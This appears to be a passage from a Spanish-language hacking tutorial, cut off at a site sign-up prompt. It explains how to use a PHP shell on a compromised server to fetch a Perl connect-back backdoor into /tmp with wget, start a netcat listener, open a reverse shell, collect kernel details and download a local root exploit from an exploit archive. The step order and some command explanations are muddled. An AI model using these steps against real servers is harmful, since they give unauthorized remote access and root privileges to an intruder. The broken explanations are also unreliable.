Haciendo como root
Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay,no les saldran los permisos que tene cada carpeta para verlos, en vez de solo poner ls, le añadimos -la Ejemplo: ls -la Y a la izquierda del todo les saldran hay los permisos ;) No solo les saldran los permisos, sino tambien la fecha que se subio, hora, etc... Weno pues hay se les kitaron las dudas, ya saben lo que significa cada letra :D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3-# AcomodandoBackshell en el Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ahora subimos una backshell como la datach0s o la in que son backshells en perl. Este tuto lo guiare con la datacha0s. La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos temporales y en un 99% de los servers tendremos permisos de escritura :D Para ir al directorio /tmp/ y subir la backshell ejecutaremos losiguiente: cd /tmp/;wget usuarios.lycos.es/teamzer0/backdoors/dc.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 4-# Poniendo a la Escucha NetCat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Una vez subida la dc.pl, dejamos el netcat en nuestro PC a la escucha, en este caso dejaremos a la escucha el puerto 9000 poniendo lo siguiente: -lvvp 9000 Cuando le pongamos a la escucha deberia aparecer lo siguiente: listening on [any] 9000... Ahora ya vamos a la shell y ejecutamos la dc.pl para conectarnos a nuestro PC de la siguiente manera: perl dc.pl TUIP PUERTOaLAescuchaENnetcat Ejemplo: perl dc.pl 10.0.1.251 9000 Nos Saldra lo siguiente en nuestra shell si se conecta a nuestro PC. Data Cha0s Connect Back Backdoor
[*] Dumping Arguments [*] Connecting... [*] Spawning Shell [*] Datached
Ahora nos fijamos en netcat y nosaparecera ke nos hemos conectado. Parecido a esto: connect to [81.47.74.9] from euirc.gr [66.225.230.248] 57566 Hay ya tamos conectados al server desde nuestro PC :D Weno ahora la php shell con lo ke subimos la dc y nos conectamos ya la podemos cerrar, ya que ahora aremos todo ejecutando comandos desde la shell ke tenemos en netcat :P ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 5-# Onteniendo Informaciondel Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ponemos en el netcat: pwd;uname -a Significado de cada Comando: id: Te dice en el Directorio que estas uname -a: Informacion del Sistema Al ejecutar eso les deberia salir algo parecido a esto: /tmp Linux server.corpoweb.com 2.4.20-021stab028.24.777-enterprise #1 SMP Fri Jan 6 9:39:27 MSK 2006 i686 athlon i386 GNU/Linux~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7-# Dar permisos y Ejecutar el Binario (r00texploit) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Weno una vez que ya sabemos el kernel (2.4.20) podemos ir a www.milw0rm.com y buscar su r00texploit.
En este caso utilizaremos el r00texploit "uselib24" Pero casi todos los binarios se utilizan igual de como realizaremos. Le subimos al server de esta manera: wget...
Regístrate para leer el documento completo.